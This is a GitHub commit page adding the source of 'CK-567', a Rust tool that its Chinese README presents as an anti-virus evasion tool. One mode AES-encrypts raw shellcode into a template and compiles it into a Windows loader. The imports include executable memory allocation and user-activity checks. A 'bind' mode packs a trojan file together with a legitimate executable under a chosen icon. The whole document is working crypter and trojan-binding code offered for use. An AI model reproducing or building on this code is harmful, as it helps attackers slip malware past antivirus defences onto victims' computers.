Skip to content

Commit

Permalink
init
Browse files Browse the repository at this point in the history
  • Loading branch information
@TheBlindM
TheBlindM committed Jun 26, 2023
0 parents commit 7027823
Show file tree
Hide file tree
Showing 14 changed files with 633 additions and 0 deletions.
30 changes: 30 additions & 0 deletions Cargo.toml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
[package]
name = "CK-567"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[build-dependencies]
winres = "0.1"
[dependencies]
aes = "0.8"
ctr = "0.9"
cipher = {version = "0.4.3", features=["block-padding"]}
clap = "4.3.0"
hex = "0.4.2"
rust-embed="6.4.0"
libaes = "*"
rand = "*"
base64 = "0.21.2"

winapi = { version = "0.3.9",features = ["libloaderapi","minwinbase","rpc","winnls","heapapi","winuser", "winnt", "memoryapi","sysinfoapi"]}


[profile.release]
opt-level = "z" # 使用最高级别的优化
lto = true # 启用链接时优化
codegen-units = 1 # 设置为1以降低编译时间
panic = 'abort' # 使用 "abort" 模式来处理 panic
strip = "symbols" # 剥离所有符号,包括调试符号和未使用的符号
overflow-checks = false # 禁用溢出检查
76 changes: 76 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,76 @@
<div align="center">
<h1>CK-567</h1>
<h2>CK-567 强大的Anti-Virus对抗工具</h2>
</div>

### 由遮天 项目组指导
shellcode 格式目前只支持 raw

### 使用
```
▄████▄ ██ ▄█▀
▒██▀ ▀█ ██▄█▒
▒▓█ ▄ ▓███▄░
▒▓▓▄ ▄██▒▓██ █▄
▒ ▓███▀ ░▒██▒ █▄
░ ░▒ ▒ ░▒ ▒▒ ▓▒
░ ▒ ░ ░▒ ▒░
░ ░ ░░ ░
░ ░ ░ ░
version:0.1
```

**加载器:**
```
▄████▄ ██ ▄█▀
▒██▀ ▀█ ██▄█▒
▒▓█ ▄ ▓███▄░
▒▓▓▄ ▄██▒▓██ █▄
▒ ▓███▀ ░▒██▒ █▄
░ ░▒ ▒ ░▒ ▒▒ ▓▒
░ ▒ ░ ░▒ ▒░
░ ░ ░░ ░
░ ░ ░ ░
version:0.1
error: the following required arguments were not provided:
-f <file>
-n <name>
Usage: CK-567.exe shellcode -f <file> -n <name>
For more information, try '--help'.
```
```
CK-567.exe shellcode -f=C:\Users\10431\Desktop\payload.bin -n=a1
```

**捆绑木马:**
```
▄████▄ ██ ▄█▀
▒██▀ ▀█ ██▄█▒
▒▓█ ▄ ▓███▄░
▒▓▓▄ ▄██▒▓██ █▄
▒ ▓███▀ ░▒██▒ █▄
░ ░▒ ▒ ░▒ ▒▒ ▓▒
░ ▒ ░ ░▒ ▒░
░ ░ ░░ ░
░ ░ ░ ░
version:0.1
error: the following required arguments were not provided:
-f <file>
-i <ico>
-t <trojan>
Usage: CK-567.exe bind -f <file> -i <ico> -t <trojan>
For more information, try '--help'.
```
10 changes: 10 additions & 0 deletions build.rs
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
extern crate winres;


fn main() {
if cfg!(target_os = "windows") {
let mut res = winres::WindowsResource::new();
res.set_icon("ck.ico");
res.compile().unwrap();
}
}
Binary file added ck.ico
Binary file not shown.
138 changes: 138 additions & 0 deletions src/core/loader.rs
Original file line number Diff line number Diff line change
@@ -0,0 +1,138 @@
use std::fs::{create_dir_all, read, remove_dir_all, write};
use std::path::Path;
use std::process::{Command, Stdio};
use std::ptr::null;

use aes::Aes256;
use rust_embed::RustEmbed;

use crate::utils;
use crate::utils::aesEncrypt;

pub trait Loader {
fn load(&self);
}


#[derive(RustEmbed)]
#[folder = "temp"]
struct temFile;

const key_placeholder: &str = "${key}";
const iv_placeholder: &str = "${iv}";
const base64Str_placeholder: &str = "${base64Str}";
const package_placeholder: &str = "${packageName}";
const hexCode_placeholder: &str = "${hexCode}";

impl Loader for ShellCodeHandler {
fn load(&self) {
println!("shellcode 处理中。。。");
let shellcode = match read(&self.file_path) {
Ok(res) => res,
Err(err) => {
println!("{}", err);
std::process::exit(1);
}
};

let mainFile = temFile::get("shellcode/main.rs").unwrap();
let cargoToml = temFile::get("shellcode/Cargo.toml").unwrap();
let buildRs = temFile::get("shellcode/build.rs").unwrap();
let mainFile_str = std::str::from_utf8(mainFile.data.as_ref()).unwrap();
let cargoToml_str = std::str::from_utf8(cargoToml.data.as_ref()).unwrap();
let buildRs_str = std::str::from_utf8(buildRs.data.as_ref()).unwrap();

let (key, iv, ciphertext) = aesEncrypt(shellcode);

let base64_str = base64::encode(&ciphertext);
let mainFile_str = &mainFile_str.replace(&iv_placeholder, &iv);
let mainFile_str = &mainFile_str.replace(&key_placeholder, &key);
let mainFile_str = &mainFile_str.replace(&hexCode_placeholder, &hex::encode(&base64_str));
let cargoToml_str = &cargoToml_str.replace(&package_placeholder, &self.package_name);


if Some(&self.ico).is_some() & !&self.ico.is_empty() {
println!("ico:{}", self.ico);
let ico = read(&self.ico).unwrap();
let _ = write(format!("loader/ck.ico"), ico);
}

let _ = create_dir_all("loader/src");
let _ = create_dir_all("loader/.cargo");
let _ = write(format!("loader/src/main.rs"), mainFile_str);
let _ = write(format!("loader/Cargo.toml"), cargoToml_str);
let _ = write(format!("loader/build.rs"), buildRs_str);
complie();
}
}

impl Loader for BindHandler {
fn load(&self) {
println!("捆绑文件中。。。");
let path = Path::new(&self.file_path);
let file_name = path.file_name().unwrap().to_str().unwrap();
let file_stem_name = path.file_stem().unwrap().to_str().unwrap();

let mainFile = temFile::get("sleeve/main.rs").unwrap();
let cargoToml = temFile::get("sleeve/Cargo.toml").unwrap();
let buildRs = temFile::get("sleeve/build.rs").unwrap();
let mainFile_str = std::str::from_utf8(mainFile.data.as_ref()).unwrap();
let buildRs_str = std::str::from_utf8(buildRs.data.as_ref()).unwrap();
let cargoToml_str = std::str::from_utf8(cargoToml.data.as_ref()).unwrap();


let cargoToml_str = &cargoToml_str.replace(&package_placeholder, file_stem_name);

if Some(&self.ico).is_some() & !&self.ico.is_empty() {
println!("ico:{}", self.ico);
let ico = read(&self.ico).unwrap();
let _ = write(format!("loader/ck.ico"), ico);
}

let _ = create_dir_all("loader/src");
let _ = create_dir_all("loader/tep");
let _ = create_dir_all("loader/.cargo");
let _ = write(format!("loader/src/main.rs"), mainFile_str);
let _ = write(format!("loader/build.rs"), buildRs_str);
let _ = write(format!("loader/Cargo.toml"), cargoToml_str);

println!("copying file....");

let file = read(self.file_path.clone()).expect(&format!("文件读取失败:{}", &self.file_path));

let _ = write(format!("loader/tep/{}", file_name), file);

//木马文件
println!("{}", &self.trojan_file_path);
let trojan_file = read(&self.trojan_file_path).expect(&format!("文件读取失败:{}", &self.trojan_file_path));
let _ = write(format!("loader/tep/{}.exe", file_stem_name), trojan_file);

complie();
}
}

pub fn complie() {
println!("开始编译...");
let mut cmd = Command::new("cmd")
.arg("/c")
.arg("cd loader && cargo build -Z unstable-options --out-dir ../ --target x86_64-pc-windows-msvc --release")
.spawn()
.expect("编译失败!");

let status = cmd.wait();
let _ = remove_dir_all("loader");
}


pub struct ShellCodeHandler {
pub(crate) file_path: String,
pub(crate) package_name: String,
pub(crate) ico: String,
}

pub struct BindHandler {
pub(crate) file_path: String,
pub(crate) trojan_file_path: String,
pub(crate) ico: String,
}

1 change: 1 addition & 0 deletions src/core/mod.rs
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
pub mod loader;
101 changes: 101 additions & 0 deletions src/main.rs
Original file line number Diff line number Diff line change
@@ -0,0 +1,101 @@
use std::borrow::Borrow;
use std::ptr::null;

use aes::{Aes128, Aes128Dec, Aes128Enc};
use aes::cipher::{
BlockCipher, BlockDecrypt, BlockEncrypt, generic_array::GenericArray,
KeyInit,
};
use aes::cipher::{BlockDecryptMut, BlockEncryptMut};
use aes::cipher::block_padding::Pkcs7;
use clap::{Arg, Command};
use hex;
use winapi::um::memoryapi::{VirtualAlloc, VirtualProtect};
use winapi::um::sysinfoapi::GetTickCount;
use winapi::um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE};
use winapi::um::winuser::{GetCursorPos, GetLastInputInfo, LASTINPUTINFO, MOUSEMOVEPOINT};

use crate::core::loader::{BindHandler, Loader, ShellCodeHandler};

pub mod utils;
pub mod core;


fn main() {
println!("
▄████▄ ██ ▄█▀
▒██▀ ▀█ ██▄█▒
▒▓█ ▄ ▓███▄░
▒▓▓▄ ▄██▒▓██ █▄
▒ ▓███▀ ░▒██▒ █▄
░ ░▒ ▒ ░▒ ▒▒ ▓▒
░ ▒ ░ ░▒ ▒░
░ ░ ░░ ░
░ ░ ░ ░
");
println!("version:0.1");

let matches = Command::new("ck567")
.subcommands([
Command::new("bind")
.about("捆绑exe")
.arg(
Arg::new("file")
.short('f')
.help("exe 路径")
.required(true)
).arg(
Arg::new("ico")
.short('i')
.help("ico")
.required(true)
).arg(Arg::new("trojan")
.short('t')
.required(true)
.help("木马文件路径")),
Command::new("shellcode")
.about("捆绑exe")
.arg(
Arg::new("file")
.short('f')
.help("shellcode 路径")
.required(true),
)
.arg(Arg::new("name").short('n').required(true).help("生成的exe 名称"))
.arg(
Arg::new("ico")
.short('i')
.help("exe ico")
.required(false)
)
]
)
.get_matches();

if let Some(sub_m) = matches.subcommand_matches("shellcode") {
let fp = sub_m.get_one::<String>("file").unwrap().clone();
let name = sub_m.get_one::<String>("name").unwrap().clone();
let ico;
if let Some(value) = sub_m.get_one::<String>("ico") {
ico = sub_m.get_one::<String>("ico").unwrap().clone();
} else {
ico = String::new();
}

let shell_code_loader = ShellCodeHandler { file_path: fp, package_name: name, ico };
shell_code_loader.load();
} else if let Some(sub_m_1) = matches.subcommand_matches("bundle") {
let fp = sub_m_1.get_one::<String>("file").unwrap().clone();
let trojan = sub_m_1.get_one::<String>("trojan").unwrap().clone();
let ico;
if let Some(value) = sub_m_1.get_one::<String>("ico") {
ico = sub_m_1.get_one::<String>("ico").unwrap().clone();
} else {
ico = String::new();
}

let bind_handler = BindHandler { file_path: fp, trojan_file_path: trojan, ico };
bind_handler.load();
}
}
Loading

0 comments on commit 7027823

Please sign in to comment.